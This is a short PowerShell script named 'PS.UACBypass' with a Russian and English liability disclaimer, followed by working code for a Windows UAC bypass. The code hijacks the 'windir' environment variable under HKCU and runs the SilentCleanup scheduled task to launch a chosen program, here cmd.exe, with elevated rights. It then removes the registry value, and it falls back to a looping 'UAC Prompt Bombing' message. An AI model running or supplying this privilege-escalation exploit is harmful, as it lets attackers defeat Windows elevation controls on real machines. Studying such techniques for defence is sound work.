# === Copyright (C) 20XX "PS.UACBypass" by zetod1ce [github.com/ztd38f] === #

<#
[!] ДИСКЛЕЙМЕР [!]
Автор полностью отказывается от какой-либо ответственности за использование данного скрипта. Скрипт предоставляется "КАК ЕСТЬ", может быть изменён или дополнен в любое время без уведомления. Использование допускается только для личного обучения в строго контролируемой среде под надзором профессионалов. Всё использование осуществляется исключительно на ваш страх и риск.

[!] DISCLAIMER [!]
The author fully disclaims any responsibility for the use of this script. The script is provided "AS IS" and may be changed or updated at any time without notice. Use is permitted only for personal educational purposes in a strictly controlled environment under professional supervision. All use is entirely at your own risk.
#>

function UACBypass($exe,$arg){
    $exe = (gcm $exe -ea 0).Source
    if(!(openfiles)){
        if((whoami /groups) | sls 544){
            sp "HKCU:\Environment" "windir" "$exe`" $arg `"#" -t s -force
            schtasks /run /tn Microsoft\Windows\DiskCleanup\SilentCleanup /I
            rp HKCU:\Environment windir -force; exit
        } else {do {Write-Host "UAC Prompt Bombing"; pause} while ($true); exit}
    }
}; UACBypass cmd.exe